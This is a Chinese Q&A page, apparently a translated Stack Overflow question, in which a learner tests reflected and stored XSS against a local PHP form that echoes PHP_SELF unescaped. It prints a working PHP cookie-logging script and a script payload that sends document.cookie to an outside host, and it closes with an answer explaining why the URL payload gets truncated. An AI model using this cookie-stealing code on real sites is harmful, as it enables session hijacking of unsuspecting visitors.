XSS url反射:表单标签

时间:2016-12-10 12:03:52

标签: security cookies xss

我正在学习XSS如何运作以及攻击者可以用多远来破坏我的访客。 我在w3schools上读到使用$ _SERVER [' PHP_SELF']来回显当前文件:

<form method="post" action="<?php echo $_SERVER['PHP_SELF'];?>">

不使用htmlspecialchars()可以使我的应用程序容易受到xss的攻击,所以我在我的localhost上创建了一个非常基本的测试页面,这里是源代码:

&#13;
&#13; 
<!DOCTYPE html>
<html>
<body>

<form method="post" action="<?php echo $_SERVER['PHP_SELF'];?>">
  Name: <input type="text" name="fname">
  <input type="submit">
</form>

<?php
if ($_SERVER["REQUEST_METHOD"] == "POST") {
    // collect value of input field
    $name = $_REQUEST['fname'];
    if (empty($name)) {
        echo "Name is empty";
    } else {
        echo $name;
    }
}
?>

</body>
</html>
&#13;
&#13;
&#13;

此页面容易受到XSS存储和XSS反映。 首先,我使用url尝试了以下有效负载:

localhost:553/xss test.php/"><script>alert(1)</script>

然后它弹出一个警告框,一切都很好,尝试了同样的输入表格,它也工作,我试图用PHP捕获cookie并制作以下​​脚本来捕获cookie:

<?php
$cookie = $_GET['c']; //This obtains a value of variable c in url passed by GET method of HTTP and stores it in $cookie 

$ip = getenv ('REMOTE_ADDR'); // Gets the value of an environment variable which denotes the IP of client and stores it in $ip 

$date = date ("j F, Y, g:i a"); //Records the Date and Time of capture

$referer = getenv ('HTTP_REFERER'); //Gets the value of an environment variable which denotes the site which redirected to your cookie catcher and stores it in $referer

$fp = fopen ('kendo.html','a'); //opening a file kendo.html in append mode in which details will be stored

fwrite ($fp, 'Cookie :'.$cookie.'<br/> IP :'.$ip.'<br/> Date and Time :'.$date.'<br/> Referer : '.$referer.'<br>'); //passing the reference of file kendo.html and passing the rest of the details we obtained

fclose ($fp); //closing the file reference 

header ('Location: http://example.com/'); //Redirecting the client back to page you wish 

?>

将其上传到我的网站并尝试使用XSS存储以下有效负载:

<script>document.location="http://example.com/404.php?c=" + document.cookie</script>

其中404.php是我的cookie捕获器,它工作得很好,但当我尝试使用这样的URL时:

localhost:553/xss test.php/"><script>document.location="http://www.example.com/404.php?c=" + document.cookie</script>

什么都没发生,我看着源头发现了这个:

<!DOCTYPE html>
<html>
<body>

<form method="post" action="/xss test.php/"><script>document.location="http://example.com/404.php">
  Name: <input type="text" name="fname">
  <input type="submit">
</form>


</body>
</html>

我的有效载荷的其余部分条纹,我一直在寻找2天的根本原因,但我无法找到原因,尝试了其他功能,如window.location,得到了相同的结果.. 。为什么这样的事情会发生?

1 个答案:

答案 0 :(得分:0)

因为PHP_SELF返回脚本的路径/名称,没有URL参数,在这种情况下会发生什么?成了参数。

相关问题
最新问题